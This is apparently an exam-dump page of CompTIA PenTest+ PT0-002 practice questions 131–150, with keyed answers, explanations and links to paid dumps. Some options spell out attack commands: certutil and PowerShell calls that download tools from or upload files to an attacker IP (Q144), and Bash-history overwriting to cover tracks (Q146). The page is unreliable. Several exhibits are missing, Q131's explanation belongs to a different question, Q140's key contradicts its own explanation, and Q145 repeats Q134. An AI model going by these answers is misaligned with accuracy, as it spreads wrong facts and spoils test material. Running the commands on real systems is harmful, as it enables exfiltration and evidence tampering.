[Q131-Q150] Real Exam Questions PT0-002 Dumps Exam Questions in here [Mar-2025]


NEW QUESTION # 131
After running the enum4linux.pl command, a penetration tester received the following output:

Which of the following commands should the penetration tester run NEXT?

  • A. net rpc share -S 192.168.100.56 -U ''
  • B. smbspool //192.160.100.56/print$
  • C. smbget //192.168.100.56/web -U ''
  • D. smbclient //192.168.100.56/web -U '' -N

Answer: D

Explanation:
A vulnerability scan is a type of assessment that helps to identify vulnerabilities in a network or system. It scans systems for potential vulnerabilities, misconfigurations, and outdated software. Based on the output from a vulnerability scan, a penetration tester can identify vulnerabilities that may be exploited to gain access to a system. In this scenario, the output from the penetration testing tool shows that 100 hosts contained findings due to improper patch management. This indicates that the vulnerability scan detected vulnerabilities that could have been prevented through proper patch management. Therefore, the most likely test performed by the penetration tester is a vulnerability scan.


NEW QUESTION # 132
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)

  • A. Nikto
  • B. Retina
  • C. Wireshark
  • D. Burp Suite
  • E. Nessus
  • F. Shodan

Answer: C,F

Explanation:
Wireshark and Shodan are two tools that can be used to perform passive reconnaissance, which means collecting information from publicly available sources without interacting with the target or revealing one's identity. Wireshark is a tool that can be used to capture and analyze network traffic, such as packets, protocols, or sessions, without sending any data to the target. Shodan is a tool that can be used to search for devices or services on the internet, such as web servers, routers, cameras, or firewalls, without contacting them directly.
The other tools are not passive reconnaissance tools, but rather active reconnaissance tools, which means interacting with the target or sending data to it. Nessus and Retina are tools that can be used to perform vulnerability scanning, which involves sending probes or requests to the target and analyzing its responses for potential weaknesses. Burp Suite is a tool that can be used to perform web application testing, which involves intercepting and modifying web requests and responses between the browser and the server.
Reference: https://resources.infosecinstitute.com/topic/top-10-network-recon-tools/


NEW QUESTION # 133
Which of the following tools provides Python classes for interacting with network protocols?

  • A. PowerSploit
  • B. Impacket
  • C. Empire
  • D. Responder

Answer: B

Explanation:
Impacket is a tool that provides Python classes for interacting with network protocols, such as SMB, DCE/RPC, LDAP, Kerberos, etc. Impacket can be used for network analysis, packet manipulation, authentication spoofing, credential dumping, lateral movement, and remote execution.


NEW QUESTION # 134
After gaining access to a Linux system with a non-privileged account, a penetration tester identifies the following file:

Which of the following actions should the tester perform FIRST?

  • A. Change the file permissions.
  • B. Cover tracks.
  • C. Use privilege escalation.
  • D. Start a reverse shell.

Answer: C

Explanation:
The file .scripts/daily_log_backup.sh has permissions set to 777, meaning that anyone can read, write, or execute the file. Since it's owned by the root user and the penetration tester has access to the system with a non-privileged account, this could be a potential avenue for privilege escalation. In a penetration test, after finding such a file, the tester would likely want to explore it and see if it can be leveraged to gain higher privileges. This is often done by inserting malicious code or commands into the script if it's being executed with higher privileges, such as root in this case.


NEW QUESTION # 135
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

  • A. chmod o+e script.sh
  • B. chmod o+x script.sh
  • C. chmod u+x script.sh
  • D. chmod u+e script.sh

Answer: C

Explanation:
Reference: https://newbedev.com/chmod-u-x-versus-chmod-x


NEW QUESTION # 136
A penetration tester is assessing a wireless network. Although monitoring the correct channel and SSID, the tester is unable to capture a handshake between the clients and the AP. Which of the following attacks is the MOST effective to allow the penetration tester to capture a handshake?

  • A. Replay
  • B. Key reinstallation
  • C. Evil twin
  • D. Deauthentication

Answer: D

Explanation:
A deauthentication attack forces the connected clients to drop and re-associate with the AP, so the tester can capture the handshake while the clients reconnect.


NEW QUESTION # 137
During an engagement, a penetration tester found the following list of strings inside a file:

Which of the following is the BEST technique to determine the known plaintext of the strings?

  • A. Credential-stuffing attack
  • B. Brute-force attack
  • C. Dictionary attack
  • D. Rainbow table attack

Answer: D


NEW QUESTION # 138
A compliance-based penetration test is primarily concerned with:

  • A. bypassing protection on edge devices.
  • B. obtaining PII from the protected network.
  • C. determining the efficacy of a specific set of security standards.
  • D. obtaining specific information from the protected network.

Answer: C


NEW QUESTION # 139
A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?

  • A. Smurf
  • B. Ping flood
  • C. Fraggle
  • D. Ping of death

Answer: C

Explanation:
A Fraggle attack is the same as a Smurf attack, but it uses UDP rather than ICMP, so it still works on a segment where ICMP is disabled. Prevention of a Smurf attack is almost identical to prevention of a Fraggle attack.
Reference: https://www.okta.com/identity-101/fraggle-attack/


NEW QUESTION # 140
An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client's information?

  • A. Publish the findings after the client reviews the report
  • B. Report any findings to regulatory oversight groups
  • C. Encrypt and store any client information for future analysis
  • D. Follow the established data retention and destruction process

Answer: C

Explanation:
After completing an assessment and providing the report and evidence to the client, it is important to follow the established data retention and destruction process to ensure the confidentiality of the client's information. This process typically involves securely deleting or destroying any data collected during the assessment that is no longer needed, and securely storing any data that needs to be retained. This helps to prevent unauthorized access to the client's information and protects the client's confidentiality.
Reporting any findings to regulatory oversight groups may be necessary in some cases, but it should be done only with the client's permission and in accordance with any relevant legal requirements. Publishing the findings before the client has reviewed the report is also not recommended, as it may breach the client's confidentiality and damage their reputation. Encrypting and storing client information for future analysis is also not recommended unless it is necessary and in compliance with any legal or ethical requirements.


NEW QUESTION # 141
A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log:

Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?

  • A. Disassemble the binary code and then identify the break points.
  • B. Start a packet capture with Wireshark and then run the application.
  • C. Run an application vulnerability scan and then identify the TCP ports used by the application.
  • D. Run the application attached to a debugger and then review the application's log.

Answer: B


NEW QUESTION # 142
The results of an Nmap scan are as follows:

Which of the following would be the BEST conclusion about this device?

  • A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.
  • B. This device is most likely a proxy server forwarding requests over TCP/443.
  • C. This device may be vulnerable to remote code execution because of a buffer overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.
  • D. This device is most likely a gateway with in-band management services.

Answer: D

Explanation:
The Heartbleed bug is an OpenSSL bug that does not affect SSH.
Reference: https://www.sos-berlin.com/en/news-heartbleed-bug-does-not-affect-jobscheduler-or-ssh


NEW QUESTION # 143
A penetration tester gives the following command to a systems administrator to execute on one of the target servers:
rm -f /var/www/html/G679h32gYu.php
Which of the following BEST explains why the penetration tester wants this command executed?

  • A. To delete credentials the tester created
  • B. To trick the systems administrator into installing a rootkit
  • C. To close down a reverse shell
  • D. To remove a web shell after the penetration test

Answer: D

Explanation:
A web shell is a malicious script that allows remote access and control of a web server. A penetration tester may use a web shell to execute commands on the target server during a penetration test. However, after the test is completed, the penetration tester should remove the web shell to avoid leaving any traces or backdoors on the server. The command rm -f /var/www/html/G679h32gYu.php deletes the file G679h32gYu.php from the web server's document root directory, which is likely the location of the web shell. The other options are not plausible explanations for why the penetration tester wants this command executed.


NEW QUESTION # 144
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

  • A. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/accesschk64.exe
  • B. schtasks /query /fo LIST /v | find /I "Next Run Time:"
  • C. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
  • D. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/upload.php', 'systeminfo.txt')

Answer: A

Explanation:
Reference: https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while
Reference: https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk


NEW QUESTION # 145
After gaining access to a Linux system with a non-privileged account, a penetration tester identifies the following file:

Which of the following actions should the tester perform FIRST?

  • A. Change the file permissions.
  • B. Cover tracks.
  • C. Use privilege escalation.
  • D. Start a reverse shell.

Answer: C

Explanation:
The file .scripts/daily_log_backup.sh has permissions set to 777, meaning that anyone can read, write, or execute the file. Since it's owned by the root user and the penetration tester has access to the system with a non-privileged account, this could be a potential avenue for privilege escalation. In a penetration test, after finding such a file, the tester would likely want to explore it and see if it can be leveraged to gain higher privileges. This is often done by inserting malicious code or commands into the script if it's being executed with higher privileges, such as root in this case.


NEW QUESTION # 146
A penetration tester gains access to a system and establishes persistence, and then runs the following commands:
cat /dev/null > temp
touch -r .bash_history temp
mv temp .bash_history
Which of the following actions is the tester MOST likely performing?

  • A. Covering tracks by clearing the Bash history
  • B. Making a copy of the user's Bash history for further enumeration
  • C. Making decoy files on the system to confuse incident responders
  • D. Redirecting Bash history to /dev/null

Answer: A

Explanation:
The commands are used to clear the Bash history file of the current user, which records the commands entered in the terminal. The first command redirects /dev/null (a special file that discards any data written to it) to temp, which creates an empty file named temp. The second command changes the timestamp of temp to match that of .bash_history (the hidden file that stores the Bash history). The third command renames temp to .bash_history, which overwrites the original file with an empty one. This effectively erases any trace of the commands executed by the user.
Reference: https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-cover-your-tracks-remain-undetected-0244768/


NEW QUESTION # 147
A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet. Which of the following is the BEST action for the tester to take?

  • A. Escalate the issue.
  • B. Stop the penetration test.
  • C. Include the discovery and interaction in the daily report.
  • D. Check the scoping document to determine if exfiltration is within scope.

Answer: C


NEW QUESTION # 148
An Nmap scan of a network switch reveals the following:

Which of the following technical controls will most likely be the FIRST recommendation for this device?

  • A. Multifactor authentication
  • B. System-hardening techniques
  • C. Network segmentation
  • D. Encrypted passwords

Answer: B


NEW QUESTION # 149
A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?

  • A. Scrape web presences and social-networking sites.
  • B. Specially craft and deploy phishing emails to key company leaders.
  • C. Run a vulnerability scan against the company's external website.
  • D. Runtime the company's vendor/supply chain.

Answer: A


NEW QUESTION # 150
......


The CompTIA PT0-002 (CompTIA PenTest+) exam is a performance-based certification that tests an individual's skills in conducting penetration testing and vulnerability assessments. The CompTIA PenTest+ certification validates the skills a cybersecurity practitioner needs to conduct a successful penetration test and vulnerability assessment in a live environment. It also validates the knowledge needed to manage engagements and report on findings.


Earning a CompTIA PenTest+ certification helps professionals demonstrate their understanding and command of emerging penetration testing tools, techniques, and best practices. It is also reviewed and backed by trusted organizations and used in real-world applications to protect businesses and establishments. The CompTIA PenTest+ certification gives cybersecurity professionals a chance to develop their proficiency in ethical penetration testing and land a prestigious job in a highly dynamic industry.


Authentic Best resources for PT0-002 Online Practice Exam: https://www.realvce.com/PT0-002_free-dumps.html

Get the superior quality PT0-002 Dumps with explanations waiting just for you, get it now: https://drive.google.com/open?id=1seT2-wi8QPRsTtaJ9kB2oDlA7WN4JaMn